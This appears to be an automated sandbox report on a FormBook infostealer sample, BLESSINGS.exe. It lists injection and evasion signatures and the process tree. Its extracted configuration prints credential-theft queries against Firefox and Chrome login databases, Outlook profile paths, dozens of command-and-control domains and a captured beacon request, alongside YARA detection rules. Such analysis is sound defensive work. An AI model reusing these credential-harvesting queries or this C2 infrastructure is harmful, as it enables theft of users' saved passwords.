Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report BLESSINGS.exe

Overview

General Information

Sample Name:BLESSINGS.exe
Analysis ID:339345
MD5:30cb872994e8a0a4a635b06bfbe38006
SHA1:02e502ef79ea251f04fa9e02dd1d7639e59c7ddc
SHA256:d0b62e121a89ba8e44b4b71a887dd80df1e4fc746dabc200854622e9ed1fa8cb
Tags:exe

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • BLESSINGS.exe (PID: 4588 cmdline: 'C:\Users\user\Desktop\BLESSINGS.exe' MD5: 30CB872994E8A0A4A635B06BFBE38006)
    • AddInProcess32.exe (PID: 6264 cmdline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • raserver.exe (PID: 6744 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
          • cmd.exe (PID: 6784 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bc2", "KEY1_OFFSET 0x1d510", "CONFIG SIZE : 0xf7", "CONFIG OFFSET 0x1d615", "URL SIZE : 33", "searching string pattern", "strings_offset 0x1c1a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x1004744a", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70d3", "0x9f715026", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012172", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014c1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "strahlenschutz.digital", "soterppe.com", "wlw-hnlt.com", "topheadlinetowitness-today.info", "droriginals.com", "baculatechie.online", "definity.finance", "weddingmustgoon.com", "ludisenofloral.com", "kenniscourtureconsignments.com", "dl888.net", "singledynamics.com", "internetmarkaching.com", "solidconstruct.site", "ip-freight.com", "11sxsx.com", "incomecontent.com", "the343radio.com", "kimberlygoedhart.net", "dgdoughnuts.net", "vivethk.com", "st-reet.com", "luxusgrotte.com", "hareland.info", "fitdramas.com", "shakahats.com", "cositasdepachecos.com", "lhc965.com", "5hnjy.com", "zoommedicaremeetings.com", "bebywye.site", "ravenlewis.com", "avia-sales.xyz", "screwtaped.com", "xaustock.com", "hongreng.xyz", "lokalised.com", "neosolutionsllc.com", "ecandkllc.com", "sistertravelalliance.com", "brotherhoodoffathers.com", "mybestme.store", "vigilantdis.com", "sqatzx.com", "kornteengoods.com", "miamiwaterworld.com", "mywillandmylife.com", "novergi.com", "eaglesnestpropheticministry.com", "sterlworldshop.com", "gabriellagullberg.com", "toweroflifeinc.com", "tiendazoom.com", "dividupe.com", "szyulics.com", "theorangepearl.com", "hotvidzhub.download", "asacal.com", "systemedalarmebe.com", "margosbest.com", "kathymusic.com", "quintred.com", "mad54.art", "simplification.business", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.registeredagentfirm.com/jqc/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      8.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        8.2.AddInProcess32.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        8.2.AddInProcess32.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17609:$sqlite3step: 68 34 1C 7B E1
        • 0x1771c:$sqlite3step: 68 34 1C 7B E1
        • 0x17638:$sqlite3text: 68 38 2A 90 C5
        • 0x1775d:$sqlite3text: 68 38 2A 90 C5
        • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
        8.2.AddInProcess32.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          8.2.AddInProcess32.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 8.2.AddInProcess32.exe.400000.0.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bc2", "KEY1_OFFSET 0x1d510", "CONFIG SIZE : 0xf7", "CONFIG OFFSET 0x1d615", "URL SIZE : 33", "searching string pattern", "strings_offset 0x1c1a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x1004744a", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70d3", "0x9f715026", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012172", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014c1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",
          Multi AV Scanner detection for submitted fileShow sources
          Source: BLESSINGS.exeVirustotal: Detection: 45%Perma Link
          Source: BLESSINGS.exeReversingLabs: Detection: 15%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: BLESSINGS.exeJoe Sandbox ML: detected
          Source: 8.2.AddInProcess32.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: BLESSINGS.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: BLESSINGS.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, raserver.exe, 0000000F.00000002.688878285.0000000004A2F000.00000004.00000001.sdmp, AddInProcess32.exe.1.dr
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000000.460948394.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, raserver.exe, 0000000F.00000002.687497204.000000000461F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: AddInProcess32.exe, 00000008.00000002.475617177.0000000001290000.00000040.00000001.sdmp
          Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000008.00000002.474933726.0000000000B62000.00000002.00020000.sdmp, raserver.exe, 0000000F.00000002.688878285.0000000004A2F000.00000004.00000001.sdmp, AddInProcess32.exe.1.dr
          Source: Binary string: RAServer.pdbGCTL source: AddInProcess32.exe, 00000008.00000002.475617177.0000000001290000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000A.00000000.460948394.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 4x nop then jmp 0117F696h1_2_0117EEC2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop edi8_2_00416BF3
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop edi8_2_00416C07
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop edi8_2_00416C27
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop edi8_2_00416C3F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop edi8_2_00417D68
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop edi15_2_001E6BF3
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop edi15_2_001E6C07
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop edi15_2_001E6C3F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop edi15_2_001E6C27
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop edi15_2_001E7D68
          Source: global trafficHTTP traffic detected: GET /jqc/?CZ=GWrWoWa4zZjFn82G+0nNh4GvWCUBG1oNYElUd01Cxs8I6tEnxSPY6FoFnAuUsLE3P+RrU5FSoA==&sv28R0=gnKTZf8P HTTP/1.1Host: www.quintred.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 91.195.241.137 91.195.241.137
          Source: Joe Sandbox ViewASN Name: SEDO-ASDE SEDO-ASDE
          Source: global trafficHTTP traffic detected: GET /jqc/?CZ=GWrWoWa4zZjFn82G+0nNh4GvWCUBG1oNYElUd01Cxs8I6tEnxSPY6FoFnAuUsLE3P+RrU5FSoA==&sv28R0=gnKTZf8P HTTP/1.1Host: www.quintred.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.toweroflifeinc.com
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: BLESSINGS.exe, 00000001.00000003.420634051.00000000014F8000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.c/g
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.11sxsx.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.11sxsx.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.11sxsx.com/jqc/www.sterlworldshop.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.11sxsx.comReferer:
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.asacal.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.asacal.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.asacal.com/jqc/:
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.asacal.comReferer:
          Source: explorer.exe, 0000000A.00000002.686806535.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.cositasdepachecos.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.cositasdepachecos.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.cositasdepachecos.com/jqc/www.margosbest.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.cositasdepachecos.comReferer:
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.droriginals.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.droriginals.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.droriginals.com/jqc/www.kornteengoods.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.droriginals.comReferer:
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
